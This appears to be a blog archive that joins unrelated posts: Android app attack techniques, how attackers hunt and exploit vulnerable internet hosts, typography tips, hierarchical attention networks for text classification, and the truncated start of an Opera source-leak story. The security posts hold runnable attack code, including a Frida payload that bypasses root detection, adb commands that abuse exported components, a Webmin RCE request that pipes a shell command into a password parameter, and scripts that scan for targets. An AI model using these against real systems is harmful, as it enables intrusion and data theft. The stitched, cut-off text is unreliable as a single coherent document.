Why attackers can’t resist Android applications

In their quest for new attack surfaces, threat actors find a steady supply of easy targets among the ~2.7 million Android applications.

What makes Android applications irresistible targets? 

  1. The ease with which an attacker can acquire the entire source code of an Android application.
  2. The source code often contains API keys, secret tokens, sensitive credentials, and endpoints, which developers forget to remove after staging.

Developers often lack awareness of mobile-app attack vectors, owing to a false sense of security provided by the sandboxed, permission-oriented operating system. However, mobile apps share the same attack vectors as web apps, albeit with different exploitation techniques.

When an attacker meets an Android app

After getting their hands on an Android app’s source code, attackers first decompile it, analyse it for weaknesses, and then exploit it.

Decompiling the source code

The attacker first extracts the files and folders from the APK file of an Android app, much like unzipping a zip file. However, the extracted files are compiled. To read the source code, the attacker decompiles the files using:

  • Apktool: To read the AndroidManifest.xml file. It also disassembles the app to smali code and allows the attacker to repack the APK after modifications.
  • Dex2jar: To convert the DEX file into a JAR file.
  • Jadx/JD-GUI: To read the decompiled code in a GUI.
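
As a minimal sketch of this workflow (assuming the APK is saved as app.apk and the tools are installed on the PATH), the whole chain can be scripted:

import subprocess

APK = "app.apk"  # hypothetical file name

# apktool decodes AndroidManifest.xml and disassembles the app to smali code
subprocess.run(["apktool", "d", APK, "-o", "app_smali"], check=True)

# dex2jar converts the DEX bytecode into a JAR that Java decompilers can open
subprocess.run(["d2j-dex2jar", APK, "-o", "app.jar"], check=True)

# jadx decompiles straight to Java sources (jd-gui is the GUI alternative)
subprocess.run(["jadx", "-d", "app_java", APK], check=True)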

Analysing the source code

The attacker analyses the source code using two methods:

  • Static Analysis
  • Dynamic Analysis

Static Analysis

In this approach, the attacker examines the source code for secret tokens, API keys, credentials, and secret paths. They also study the structure of the code, checking for activities, content providers, broadcast receivers, vulnerable permissions, local storage, sensitive files, etc.

Here are some examples of what attackers look for during static analysis:

Sensitive Information 

As we can see, the strings.xml file below exposes sensitive information such as API keys, bucket name, Firebase database URL, etc.

strings.xml file exposes sensitive information about the Android app
Working Credentials

Often, usernames and passwords are left behind in the source code, because developers forget to remove them.

Exposed passwords make the Android app vulnerable
Content Providers

Content Providers allow applications to access data from other applications. To access a Content Provider, you need its URI.

Attackers check whether the Content Provider is declared with ‘android:exported="true"’, which implies that it can be accessed by third-party applications.

The Content Provider attribute is ‘exported=true’

Content Provider URI

Below, we access the content provider declared by the vulnerable application through the `content` command-line tool, which acts as a third-party application.

Using the Content Provider to access data without a PIN
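
A minimal sketch of this step, assuming a hypothetical provider authority (the real URI is taken from the decompiled AndroidManifest.xml):

import subprocess

# Hypothetical content URI; the real authority comes from the decompiled manifest
uri = "content://com.vulnapp.provider/notes"

# The `content` tool runs in the device shell and behaves like a third-party caller
subprocess.run(["adb", "shell", "content", "query", "--uri", uri], check=True)
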
Activities

An activity implements a single screen/window in an app. So an app usually invokes a particular activity, i.e. a specific screen in another app, and not the app as a whole.

Attackers check for weaknesses in activities in the AndroidManifest.xml file. If an activity there is marked ‘exported=true,’ a third-party app can initiate that activity.

Activity marked as ‘exported=true’

For example, the screen below has a function to submit a password, and only on submitting the password can we see the dashboard.

Password required to view dashboard

However, if the activity responsible for showing the dashboard is marked ‘exported=true,’ an attacker can use the Activity Manager (am) tool to launch it directly.

Using an Activity Manager to run the activity
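
A sketch of this step, assuming hypothetical package and activity names (the real ones are read from the manifest):

import subprocess

# Hypothetical component; the real names come from AndroidManifest.xml
component = "com.vulnapp/.DashboardActivity"

# `am start` launches the exported activity directly, skipping the password screen
subprocess.run(["adb", "shell", "am", "start", "-n", component], check=True)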

By doing this, the attacker can access the dashboard without a password.

Accessing the dashboard without a password
Broadcast Receivers

Broadcast receivers listen for system-generated or custom events, broadcast by other applications or by the system itself.

Attackers check for weaknesses in Broadcast Receivers in the AndroidManifest.xml file. If the receiver declaring an intent-filter is marked ‘exported=true,’ a third-party application can easily trigger it. To prevent this, developers need to explicitly declare ‘exported=false.’

Intent-filter tag declared ‘exported=true’

After checking the parameters that the receiver accepts, attackers can craft a command that triggers the receiver on behalf of the application.

For example, the following command triggers the receiver to send a message to a phone number.

Command to trigger the receiver
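
A sketch of such a command, with a hypothetical action name and extras (the real values are read from the decompiled receiver code):

import subprocess

# Hypothetical broadcast action and extras; real values come from the receiver's code
subprocess.run([
    "adb", "shell", "am", "broadcast",
    "-a", "com.vulnapp.SEND_SMS",          # custom action the receiver listens for
    "--es", "phone", "5554",               # string extra: destination number
    "--es", "msg", "Hello from attacker",  # string extra: message body
], check=True)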

Following this, the message is delivered to the phone number:

Message sent as per command

Dynamic Analysis

In this approach, the attacker uses a binary instrumentation toolkit such as Frida to hook into a targeted application and change its implementation at runtime. It also allows the attacker to bypass root detection and SSL pinning.

Since Frida can access the classes and functions of a targeted process/application, the attacker injects their own JavaScript (JS) payload at runtime to analyse the behaviour of the code.

Bypassing root detection

The following application has root detection. Hence, to access all the capabilities of the application, the attacker needs to bypass root detection.

A device that has root detection

First, the attacker needs to identify the function responsible for root detection, which they can find in the source code:

Root detection function in the source code

If either of the functions doesSuperuserApkExist() or doesSuExist() returns True, the device is identified as a rooted device.

So, to bypass root detection, the attacker needs to change the implementation of these two functions so that they return False. This is where Frida comes in.

By injecting the following JS payload, the attacker changes the implementation of the functions responsible for root detection. 

JS payload to change the root detection function
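
A minimal sketch of such a payload, injected with Frida's Python bindings. The package/process name com.vulnapp is hypothetical; the class and method names are the ones shown in the source above:

import frida

# JS payload: hook both root-detection methods so they always return false
JS_PAYLOAD = """
Java.perform(function () {
    var PostLogin = Java.use("com.vulnapp.PostLogin");  // hypothetical package name
    PostLogin.doesSUexist.implementation = function () { return false; };
    PostLogin.doesSuperuserApkExist.implementation = function () { return false; };
});
"""

# Attach to the running app over USB and inject the payload
session = frida.get_usb_device().attach("com.vulnapp")  # hypothetical process name
script = session.create_script(JS_PAYLOAD)
script.load()
input("Hooks installed; press Enter to detach.")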

With the help of Java.use(), the attacker accesses the PostLogin class and specifies the functions to hook, i.e. doesSUexist and doesSuperuserApkExist. After this, each function starts returning False instead of True.

The Frida client then sends this JS payload to the Frida server, which runs it as a thread in the JS engine. So, whenever the application calls these functions, Frida invokes the hooked thread instead of the actual functions declared in the source code.

"<yoastmark

Conclusion

Given the increasing sophistication of cyber-attacks, it is important that Android apps undergo thorough vulnerability assessments before being published. Developers should also avoid leaving sensitive information, such as API keys and credentials, exposed in the source code.

How do threat actors discover and exploit vulnerabilities in the wild?

 

In the recent past, several security vulnerabilities have been discovered in widely used software products. Since these products are installed on a significant number of internet-connected devices, they entice threat actors looking to build botnets, steal sensitive data, and more.

In this article we explore:

  • Vulnerabilities detected in some popular products.
  • Target identification and exploitation techniques employed by intrusive threat actors.
  • Threat actors’ course of action in the event of identifying a flaw in widely used internet products/technology.

 

Popular Target Vulnerabilities and their Exploitation

Ghostcat: Apache Tomcat Vulnerability

All Apache Tomcat server versions (at the time of disclosure) are vulnerable to Local File Inclusion and potential RCE. The issue resides in the AJP protocol, an optimised, binary version of the HTTP protocol. The years-old vulnerability stems from a component that handles a request attribute improperly. The AJP connector, enabled by default, listens on TCP port 8009. Multiple scanners, exploit scripts, and honeypots surfaced within days of the original disclosure by Apache.

Stats published by researchers indicate a large number of affected systems, the numbers being much greater than originally predicted.

Twitter post on the number of affected hosts

Citrix ADC, Citrix Gateway RCE, Directory Traversal

Recently, Directory Traversal and RCE vulnerabilities in Citrix ADC and Gateway products affected at least 80,000 systems. Shortly after the disclosure, multiple entities (ProjectZeroIndia, TrustedSec) publicly released PoC scripts, which engendered a slew of exploit attempts from multiple actors in the wild.

Stats on honeypot detects per hour: https://twitter.com/sans_isc/status/1216022602436808704

Jira Sensitive Data Exposure

A few months ago, researchers found Jira instances leaking sensitive information, such as the names, roles, and email IDs of employees. Additionally, internal project details, such as milestones, current projects, owner and subscriber details, etc., were also accessible to anyone making a request to the following unauthenticated Jira endpoints:

 

https://jirahost/secure/popups/UserPickerBrowser.jspa

https://jirahost/secure/ManageFilters.jspa?filterView=popular

https://jirahost/secure/ConfigurePortalPages!default.jspa?view=popular

Companies affected due to the Jira vulnerability

Avinash Jain, from Grofers, tested the vulnerability on multiple targets and discovered a large number of vulnerable Jira instances revealing sensitive data belonging to companies such as NASA, Google, and Yahoo, and their employees.

Spring Boot Data Leakage via Actuators

Spring Boot is an open-source, Java-based framework built around the Spring MVC framework. It enables developers to quickly set up routes to serve data over HTTP. Most apps using the Spring MVC framework now also use the Boot utility, which helps developers configure which components to add and set up the framework faster.

An added feature called Actuator enables developers to monitor and manage their applications/REST APIs, by storing and serving request dumps, metrics, audit details, and environment settings.

In the event of a misconfiguration, these Actuators can be a back door into the servers, making exposed applications susceptible to breaches. A misconfiguration in Spring Boot versions 1 to 1.4 granted access to Actuator endpoints without authentication. Although later versions secure these endpoints by default and allow access only after authentication, developers still tend to overlook the misconfiguration before deploying the application.

The following actuator endpoints leak sensitive data (a probe of these paths is sketched after the list):

  • /dump: performs and returns a thread dump
  • /trace: returns a dump of the HTTP requests received by the app
  • /logfile: returns the app-logged content
  • /shutdown: commands the app to shut down gracefully
  • /mappings: returns a list of all the @RequestMapping paths
  • /env: exposes Spring’s ConfigurableEnvironment values
  • /health: returns the application’s health information
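
A minimal sketch of such a probe, assuming a hypothetical target host:

import requests

HOST = "https://target.example.com"  # hypothetical target
PATHS = ["/dump", "/trace", "/logfile", "/mappings", "/env", "/health"]

# A 200 response with a non-trivial body suggests an exposed actuator endpoint
for path in PATHS:
    try:
        r = requests.get(HOST + path, timeout=5)
        print(f"{path}: HTTP {r.status_code}, {len(r.content)} bytes")
    except requests.RequestException as exc:
        print(f"{path}: request failed ({exc})")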

 

There are other such defective Actuator endpoints that provide sensitive information, allowing attackers to:

  • Gain system information
  • Send requests as authenticated users (by leveraging session values obtained from the request dumps)
  • Execute critical commands, etc.

Webmin RCE via backdoored functionality

Webmin is a popular web-based system configuration tool. A zero-day pre-auth RCE vulnerability affects some of its versions, between 1.882 and 1.921. The vulnerability resides in the remote password change functionality: the Webmin code repository on SourceForge was backdoored with malicious code, granting remote command execution (RCE) capability on affected endpoints.

The attacker sends commands piped with password-change parameters through `password_change.cgi` on the vulnerable host running Webmin. If the Webmin app is hosted with root privileges, the adversary can execute malicious commands as an administrator.

Command execution payload
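
A sketch of the request, modelled on the public PoC for this backdoor (the target host is hypothetical; the shell command is piped into the old-password parameter):

import requests

TARGET = "https://target.example.com:10000"  # hypothetical Webmin host

# The shell command is piped into the `old` password parameter
data = {
    "user": "root", "pam": "", "expired": "2",
    "old": "test|id",   # `id` executes on the server; any command works
    "new1": "test", "new2": "test",
}

# Webmin validates the Referer header before accepting the request
headers = {"Referer": f"{TARGET}/session_login.cgi"}
r = requests.post(f"{TARGET}/password_change.cgi", data=data,
                  headers=headers, verify=False, timeout=10)
print(r.text)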

Why do threat actors exploit vulnerabilities?

  1. Breach user/company data: Data exfiltration of Sensitive/PII data
  2. Computing power: Infecting systems to mine Cryptocurrency, serve malicious files
  3. Botnets, serving malicious files: Exploits targeted at adding more bots to a larger botnet
  4. Service disruption and eventually Ransom: Locking users out of the devices
  5. Political reasons, cyber war, angry user, etc.

 

How do adversaries exploit vulnerabilities?

On disclosure of such vulnerabilities, adversaries probe the internet for technical details and exploit code to launch attacks. RAND Corporation’s research and analysis on zero-day vulnerabilities states that, after a vulnerability disclosure, it takes 6 to 37 days, with a median of 22 days, to develop a fully functional exploit. When an exploit disclosure comes with a patch, developers and administrators immediately patch the vulnerable software; auto-updates, regular security updates, and large-scale coverage of such disclosures help contain attacks. However, several systems continue to run unpatched versions of software or applications, making them easy targets for such attacks.

Steps involved in vulnerability exploitation

Once a bad actor decides to exploit a vulnerability they have to:

  • Obtain a working exploit or develop an exploit (in case of a zero-day vulnerability)
  • Utilize Proof of Concept (PoC) attached to a bug report (in case of a bug disclosure)
  • Identify as many hosts as possible that are vulnerable to the exploit
  • Maximise the number of targets to maximise profits.

Target Hunting

Even though the respective vendors patch reported vulnerabilities, a search of GitHub, or of specific CVEs on ExploitDB, turns up PoC scripts for these issues. Usually, a PoC script takes a host/URL as input and reports whether the exploit succeeded.

Adversaries identify vulnerable hosts through their signatures/behaviour, to generate a list of exploitable hosts. The following components carry signatures that help determine whether a host is vulnerable:

  • Port
  • Path
  • Subdomain
  • Indexed Content/ URL

Port

Most commonly used software has a specific default installation port. If no port is configured, the software installs on a pre-set port, and in most cases software runs on that default. For example, MySQL typically installs on port 3306, and Elasticsearch on port 9200. So, by curating a list of all servers with port 9200 open, a threat actor can identify systems likely running Elasticsearch. However, port 9200 can be used by other services/software as well.

Using port scans to discover targets to exploit the Webmin RCE vulnerabilities

  • Determine that the default port Webmin listens on after installation is port 10000.
  • Get a working PoC for the Webmin exploit.
  • Execute a port scan for port 10000 across all hosts connected to the internet.
  • This leads to the discovery of all possible Webmin installations that could be vulnerable to the exploit (a minimal sketch of this scan follows).
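
A minimal sketch of the scanning step, run here over a reserved documentation address range as a stand-in (real internet-wide scans use dedicated tools for speed):

import socket

def port_open(host: str, port: int = 10000, timeout: float = 1.0) -> bool:
    """Return True if the host accepts TCP connections on Webmin's default port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# 203.0.113.0/24 is a reserved documentation range, used here as a placeholder
for ip in (f"203.0.113.{i}" for i in range(1, 255)):
    if port_open(ip):
        print(f"{ip}: port 10000 open, possible Webmin install")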

In addition, tools like Shodan make port-based target discovery effortless. If Shodan does not index the target port, attackers leverage tools like Masscan or ZMap and run an internet-wide scan themselves. The latter approach hardly takes a day if the attacker has enough resources.

Similarly, an attacker in search of an easy way to find a list of systems affected by Ghostcat, will port scan all the target IPs and narrow down on machines with port 8009 open.

Path

Software/services are commonly installed on a distinct default path. Thus, the software can be fingerprinted by observing the signature path. For instance, WordPress installations can be identified if the path ‘wp-login.php’ is detected on the server. This facilitates locating the service, as it is accessed through a web browser.

For example, when the phpMyAdmin utility is installed, it resides by default at the path ‘/phpmyadmin’, through which users access it. In this case, a port scan won’t help, because the utility is not bound to a specific port.

Using distinct paths to discover targets to exploit Spring Boot Data Leakage

  • Gather a list of hosts that run Spring Boot. Since Spring Boot applications start on port 8080 by default, a list of hosts with that port open is a good starting point.
  • Hit specific endpoints like ‘/trace’ and ‘/env’ on those hosts and check the responses for sensitive content.

Web path scanners and web fuzzer tools such as Dirsearch or Ffuf facilitate this process.

Though responses may include false positives, actors can use techniques such as signature matching or static rule checks to narrow down the list of vulnerable hosts. As this method works with HTTP requests and responses, it can be much slower than mass-scale port scans. Shodan can also fetch hosts from its index based on HTTP responses.

Subdomain

Software is commonly installed on a specific subdomain, since that is an easier, standard, and convenient way to operate it.

For example, Jira is commonly found on a subdomain such as ‘jira.domain.com’ or ‘bug-jira.domain.com’. Even though there are no rules when it comes to subdomains, adversaries can identify certain patterns. Similar services usually installed on a subdomain include GitLab, FTP, Webmail, Redmine, Jenkins, etc.

SecurityTrails, Circl.lu, and Rapid7 Open Data hold passive DNS records. Other scanners that maintain such records are sites such as crt.sh and Censys, which collect SSL certificate records regularly and support queries over them.
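
A sketch of this technique using crt.sh's JSON output (example.com is a placeholder domain):

import requests

DOMAIN = "example.com"  # placeholder target domain

# crt.sh serves certificate-transparency records as JSON
r = requests.get("https://crt.sh/",
                 params={"q": f"%.{DOMAIN}", "output": "json"}, timeout=30)

# Keep unique certificate names that match a service pattern such as Jira
names = {n for entry in r.json() for n in entry["name_value"].splitlines()}
print(sorted(n for n in names if "jira" in n.lower()))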

Indexed Content/URL

The content published by a service is generally unique. If we employ a search engine such as Google to find pages serving specific content, based on particular signatures, the results list URLs running a particular service. This is one of the most common techniques for hunting down targets easily, and it is commonly known as ‘Google Dorking’. For instance, adversaries can quickly curate a shortlist of all cPanel login pages using the following Dork in Google Search: site:cpanel.*.* intitle:"login" -site:forums.cpanel.net. The Google Hacking Database contains numerous such Dorks, and once the search mechanism is understood, it is easy to write such queries.

Observations

There have been multiple honeypot experiments studying mass-scale exploration and exploitation in the wild. Setting up honeypots is not only a good way to understand attack patterns; it also helps identify malicious actors trying to exploit systems in the wild. The IPs/networks caught enumerating targets or exploiting vulnerable systems end up in various public blacklists. Various research efforts have set up diverse honeypots and studied the techniques used to gain access. Most attempts tried to gain access via default credentials, and originated mainly from blacklisted IP addresses.

Another interesting observation is that most honeypot-detected traffic seems to originate from China. It is also very common to see honeypots specific to a zero-day surface on GitHub soon after the release of an exploit. The Citrix ADC vulnerability (CVE-2019-19781), for instance, saw a few honeypots published on GitHub within a short time after the first exploit PoC was released.

Research carried out by Sophos, using honeypots, highlights the high rate of activity against exposed targets. As reported in the research paper, the first attack on an exposed target came anywhere from less than a minute to 2 hours after exposure. Therefore, if an accidental misconfiguration leaves a system exposed to the internet even for a short period of time, it should not be assumed that the system was not exploited.

Employing Typography to Improve Content Engagement

The purpose of content, regardless of the choice of font, size, colour, and design, is to communicate one’s thoughts. The aesthetics of the text are just as important as the composition of sentences and paragraphs in conveying ideas to the reader with clarity. So it’s not just what, but also how, a writer presents their content that determines its impact on the reader. Better typography produces better content.

How does typography affect content?

  • Typography is crucial in invoking and sustaining a reader’s interest from the first line to the last. 
  • It can enhance the overall readability of the text. 
  • It makes the reading experience less effortful, thus allowing the reader to absorb the content with ease. 
  • 90% of the content we consume on the web, in books, posters, and emails, is text. So, typography is not a mere afterthought. It is a primary factor that determines the reach and impact of the content it presents. 

Definition of Typography

 

In essence, typography is the art of arranging type, where type refers to the letters and other characters that are arranged to form textual content.

Matthew Carter’s definition of Typography

How to choose a Typeface?

Writers are often confronted with the task of choosing the appropriate font to deliver their content. 

Here are a few factors to consider when choosing a typeface:

 

  • Choose a typeface with multiple weights to create textual contrast

Varying the text weights adds contrast to the content. Apart from beautifying the text, it also helps to distinguish key text fragments from the rest of the content.

 

Typography: Adding weight to the text

  • Tailor the content to suit your audience

While creating content, the writer should have the intended audience in mind. The readers’ age, interests, and cultural backgrounds determine what they read.

For instance, children and adults prefer different types of fonts.  

To stimulate an interest in reading, young readers need well-shaped and legible letters, in fonts such as Sassoon Primary or Gill Sans. Meanwhile, commonly used font styles such as Roboto or Futura are more appealing to adults.

Typography: Sassoon font suited for children

How to add variety and flair to text content?

Contrast helps to draw the reader’s focus to certain words or phrases. It also establishes hierarchy within the content and creates a seamless flow by building relationships between sections, making it easy to navigate the different parts of the content.

Typography: Techniques of Contrasting

Techniques of contrasting

Variation in text is achieved by:

  • Adjusting the weight of text 
  • Underlining text
  • Styling text using italics
  • Changing size and color of the font
  • And many more 

Writers can define their own style of contrasting, as well.

Sample for contrasting and adding weights

Tip: To reflect hierarchy in the content, the font size of headings can be set to 1.5x to 2x that of the body text. This, together with variation in the weight of the text, helps the writer create visible gradations within, and between, sections.

Typography: Adjusting the font and font size

How to make text more engrossing?

Creating a style guide for typography will help writers standardize type and enhance legibility across their content.

Keeping the right line height for the text content

The vertical space between lines is crucial to the visual impact of the content. Narrow line spacing makes the content look cramped and proves tedious for the reader. Increasing line spacing improves readability drastically, though it adds to the content’s real estate.

Line Spacing sample

Tip: For better legibility, the line height of the text should be 1.2 to 1.5 times the size of the font.

Takeaway

Typography plays a significant role in the process of writing textual content. Good typography makes reading effortless, whereas poor typography is off-putting. Since typography is as much an art as it is a technique, the scope for experimentation is unlimited. Writers should play with different styles and patterns before settling on the one that suits their content best.

Hierarchical Attention Neural Networks: New Approaches for Text Classification

by Bofin Babu, Machine Learning Lead

Text classification is an important task in Natural Language Processing in which predefined categories are assigned to text documents. In this article, we will explore recent approaches for text classification that consider document structure as well as sentence-level attention.

In general, a text classification workflow is like this:

 

You collect a lot of labeled sample texts for each class (your dataset). Then you extract some features from these text samples. The text features from the previous step along with the labels are then fed into a machine learning algorithm. After the learning process, you’ll save your classifier model for future predictions.
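
As a minimal sketch of this workflow with scikit-learn (toy data, tf-idf features, a linear classifier, and model persistence; all names here are illustrative):

from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
import joblib

# Toy labeled dataset: texts and their class labels
texts = ["great food and friendly staff", "terrible service, never again",
         "loved the movie", "the plot was a complete mess"]
labels = ["positive", "negative", "positive", "negative"]

# Feature extraction (tf-idf) + classifier, trained together in one pipeline
model = make_pipeline(TfidfVectorizer(), LogisticRegression())
model.fit(texts, labels)

# Save the classifier model for future predictions
joblib.dump(model, "classifier.joblib")
print(model.predict(["the staff was great"]))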

One difference between classical machine learning and deep learning when it comes to classification is that in deep learning, feature extraction and classification are carried out together, whereas in classical machine learning they are usually separate tasks.

 

Proper feature extraction is an important part of machine learning for document classification, perhaps more important than choosing the right classification algorithm. If you don’t pick good features, you can’t expect your model to work well. Before discussing feature extraction further, let’s talk about some methods of representing text for feature extraction.

A text document is made of sentences, which in turn are made of words. Now the question is: how do we represent them in a way that features can be extracted efficiently?

Document representation can be based on two models:

  1. Standard Boolean models: These models use Boolean logic and set theory for information retrieval from text. They are inefficient compared to the vector space models below, for many reasons, and are not our focus.

  2. Vector space models: Almost all of the existing text representation methods are based on VSMs. Here, documents are represented as vectors.

Let’s look at two techniques by which vector space models can be implemented for feature extraction.

Bag of words (BoW) with TF-IDF

In the bag-of-words model, the text is represented as the bag (multiset) of its words. The example below makes this clear.

Here are two sample text documents:

(i) Bofin likes to watch movies. Rahul likes movies too.

(ii) Bofin also likes to play tabla.

Based on the above two text documents, we can construct a list of words in the documents as follows.

[ “Bofin”, “likes”, “to”, “watch”, “movies”, “Rahul”, “too”, “also”, “play”, “tabla” ]

Now, if we consider a simple bag-of-words model with term frequency (the number of times a term appears in the text), the feature vectors for the two examples above will be:

(i) [1, 2, 1, 1, 2, 1, 1, 0, 0, 0]

(ii) [1, 1, 1, 0, 0, 0, 0, 1, 1, 1]

A simple term frequency like this is not always a good way to characterise text. For large text documents, we use something called term frequency–inverse document frequency (tf-idf). tf-idf is the product of two statistics: term frequency (tf) and inverse document frequency (idf). We’ve just seen from the above example what tf is; now let’s understand idf. In simple terms, idf is a measure of how common a word is across all the documents. If a word occurs frequently inside a document, it has a high term frequency; if it also occurs frequently in the majority of the documents, it has a low inverse document frequency. Basically, idf helps us to filter out words like the, i, an that occur frequently but are not important for determining a document’s distinctiveness.
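
The same two documents can be vectorised with scikit-learn. Note that CountVectorizer lowercases tokens and orders the vocabulary alphabetically, so the columns differ from the hand-built list above:

from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer

docs = ["Bofin likes to watch movies. Rahul likes movies too.",
        "Bofin also likes to play tabla."]

# Plain term-frequency (bag-of-words) vectors
bow = CountVectorizer()
print(bow.fit_transform(docs).toarray())
print(bow.get_feature_names_out())

# tf-idf down-weights terms common to both documents ("bofin", "likes", "to")
tfidf = TfidfVectorizer()
print(tfidf.fit_transform(docs).toarray().round(2))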

Word embeddings with word2vec

Word2vec is a popular technique for producing word embeddings. It is based on the idea that a word’s meaning can be perceived from its surrounding words (like the proverb: “Tell me who your friends are and I’ll tell you who you are”). It produces a vector space from a large corpus, with each unique word in the corpus assigned a corresponding vector in that space. The heart of word2vec is a two-layer neural network trained to model the linguistic context of words, such that words sharing common contexts in a document lie in close proximity inside the vector space.

Word2vec uses two architectures for representation. You can (loosely) think of word2vec model creation as processing every word in a document using either of these methods (a toy sketch follows the list):

  1. Continuous bag-of-words (CBOW): In this architecture, the model predicts the current word from its context (surrounding words within a specified window size)
  2. Skip-gram: In this architecture, the model uses the current word to predict the context.
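
A toy sketch with gensim; real models are trained on corpora the size of Wikipedia, and the sentences here are placeholders:

from gensim.models import Word2Vec

# Tiny placeholder corpus of pre-tokenised sentences
sentences = [["bofin", "likes", "to", "watch", "movies"],
             ["rahul", "likes", "movies", "too"],
             ["bofin", "also", "likes", "to", "play", "tabla"]]

# sg=0 selects CBOW, sg=1 selects skip-gram
model = Word2Vec(sentences, vector_size=50, window=2, min_count=1, sg=1, epochs=100)

print(model.wv["movies"])              # the learned 50-dimensional vector
print(model.wv.most_similar("movies"))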

Word2vec models trained on large text corpora (like the entire English Wikipedia) have been shown to capture some interesting relations among words, as shown below.

An example of word2vec models trained on large corpora, capturing interesting relationships among words. Here, not only do the countries and their capitals cluster in two groups, but the distances between them in the vector space are also similar. Image source: DL4J

Following these vector space models, deep learning approaches made progress in text representation. They can be broadly categorised as either convolutional neural network based approaches or recurrent neural network (and its successors LSTM/GRU) based approaches.

Convolutional neural networks (ConvNets) have proven impressive for computer vision applications, especially image classification. Recent research exploring ConvNets for natural language processing tasks has shown promising results for text classification, such as charCNN, in which text is treated as a kind of raw signal at the character level and temporal (one-dimensional) ConvNets are applied to it.

Recurrent neural networks and their derivatives are perhaps the most celebrated neural architectures at the intersection of deep learning and natural language processing. RNNs can use their internal memory to process input sequences, making them a good architecture for several natural language processing tasks.

Although straight neural network based approaches to text classification have been quite effective, it has been observed that better representations can be obtained by including knowledge of document structure in the model architecture. This idea follows from the common-sense observations that:

  • Not all parts of a document are equally relevant for answering a query about it.
  • Finding the relevant sections in a document involves modeling the interactions of the words, not just their presence in isolation.

We’ll explore one such approach where word and sentence level attention mechanisms are incorporated for better document classification.

APPLYING HIERARCHICAL ATTENTION TO TEXTS

Two basic insights of hierarchical attention methods, in contrast to the traditional methods we have discussed so far, are:

  1. Words form sentences, sentences form documents. And essentially, documents have a hierarchical structure and a representation capturing this structure can be more effective.
  2. Different words and sentences in a document are informative to different extents.

To make this clear, let’s look at the example below:

In this restaurant review, the third sentence delivers strong meaning (positive sentiment), and the words ‘amazing’ and ‘superb’ contribute the most in defining the sentiment of the sentence.

Now let’s look at how hierarchical attention networks are designed for document classification. As I said earlier, these models include two levels of attention: one at the word level and one at the sentence level. This allows the model to pay more or less attention to individual words and sentences when constructing the representation of the document.

The hierarchical attention network (HAN) consists of several parts,

  1. a word sequence encoder
  2. a word-level attention layer
  3. a sentence encoder
  4. a sentence-level attention layer

Before exploring them one by one, let’s understand a bit about the GRU-based sequence encoder, which is the core of both the word and the sentence encoder in this architecture.

Gated Recurrent Units (GRUs) are a variation of LSTMs (Long Short-Term Memory networks), which are, in fact, a kind of Recurrent Neural Network. If you are not familiar with LSTMs, I suggest you read this wonderful article.

Unlike the LSTM, the GRU uses a gating mechanism to track the state of sequences without using separate memory cells. There are two types of gates: the reset gate and the update gate. Together they control how information is updated to the state.

Refer to the diagram above for the notation used in the following content.

1. Word Encoder

A bidirectional GRU is used to get annotations of words by summarising information from both directions, thereby incorporating the contextual information:

x_{it} = W_e w_{it}, \quad \overrightarrow{h}_{it} = \overrightarrow{\mathrm{GRU}}(x_{it}), \quad \overleftarrow{h}_{it} = \overleftarrow{\mathrm{GRU}}(x_{it})

where x_{it} is the word vector corresponding to the word w_{it}, and W_e is the embedding matrix.

We obtain an annotation for a given word w_{it} by concatenating the forward hidden state and the backward hidden state:

h_{it} = [\overrightarrow{h}_{it}, \overleftarrow{h}_{it}]

2. Word Attention

Not all words contribute equally to a sentence’s meaning. Therefore, we need an attention mechanism to extract the words that are important to the meaning of the sentence, and to aggregate the representations of those informative words into a sentence vector:

u_{it} = \tanh(W_w h_{it} + b_w), \quad \alpha_{it} = \frac{\exp(u_{it}^{\top} u_w)}{\sum_t \exp(u_{it}^{\top} u_w)}, \quad s_i = \sum_t \alpha_{it} h_{it}

At first, we feed the word annotation h_{it} through a one-layer MLP to get u_{it} as a hidden representation of h_{it}. Then we obtain the importance weights α_{it}, as shown in the equation above, by measuring the similarity of u_{it} with the word-level context vector u_w. The context vector is basically a high-level representation of how informative a word is in the given sentence, and it is learned during the training process.

3. Sentence Encoder

Similar to the word encoder, here we use a bidirectional GRU to encode the sentence vectors:

\overrightarrow{h}_i = \overrightarrow{\mathrm{GRU}}(s_i), \quad \overleftarrow{h}_i = \overleftarrow{\mathrm{GRU}}(s_i)

The forward and backward hidden states are calculated as in the word encoder, and the hidden state h_i is obtained by concatenating them:

h_i = [\overrightarrow{h}_i, \overleftarrow{h}_i]

Now the hidden state h_i summarises the neighboring sentences around sentence i, while still keeping the focus on sentence i.

4. Sentence Attention

To reward sentences that are clues to correctly classifying a document, we again use an attention mechanism at the sentence level:

u_i = \tanh(W_s h_i + b_s), \quad \alpha_i = \frac{\exp(u_i^{\top} u_s)}{\sum_i \exp(u_i^{\top} u_s)}, \quad v = \sum_i \alpha_i h_i

Similar to the word context vector, here we also introduce a sentence-level context vector u_s.

Now the document vector v is a high-level representation of the document and can be used as features for document classification.
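
A minimal PyTorch sketch of the attention pooling used at both levels; the GRU annotations are assumed to be computed already, and the dimensions are illustrative:

import torch
import torch.nn as nn

class AttentionPool(nn.Module):
    """HAN-style attention: score annotations against a learned context
    vector and return their weighted sum (s_i at word level, v at sentence level)."""
    def __init__(self, hidden_dim: int):
        super().__init__()
        self.proj = nn.Linear(hidden_dim, hidden_dim)          # one-layer MLP -> u
        self.context = nn.Parameter(torch.randn(hidden_dim))   # u_w or u_s

    def forward(self, h: torch.Tensor) -> torch.Tensor:
        # h: (batch, seq_len, hidden_dim) annotations from a bidirectional GRU
        u = torch.tanh(self.proj(h))
        alpha = torch.softmax(u @ self.context, dim=1)          # attention weights
        return (alpha.unsqueeze(-1) * h).sum(dim=1)             # weighted sum

# Usage: pool word annotations into a sentence vector
h = torch.randn(4, 20, 128)         # hypothetical GRU outputs
print(AttentionPool(128)(h).shape)  # torch.Size([4, 128])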

So we’ve seen how document structure and attention can be used to build features for classification. In benchmark studies, this method outperformed existing popular methods by a decent margin on datasets such as Yelp Reviews, IMDB, and Yahoo Answers.

Let us know what you think of attention networks in the discussion section below and feel free to ask your queries.

Opera (Presto) Source Code Leaked on Dark Web

by Rakesh Krishnan

Leaking the source code of proprietary tools is not a new scenario in the cyber threat arena. Recently, Windows 10 source code was leaked to Beta Archive’s FTP server (later removed); Beta Archive is an active discussion forum on Windows releases.

Sometimes it is an insider threat (breach); at other times, an intrusion. Either way, the result is ultimately classified as a ‘leak’.

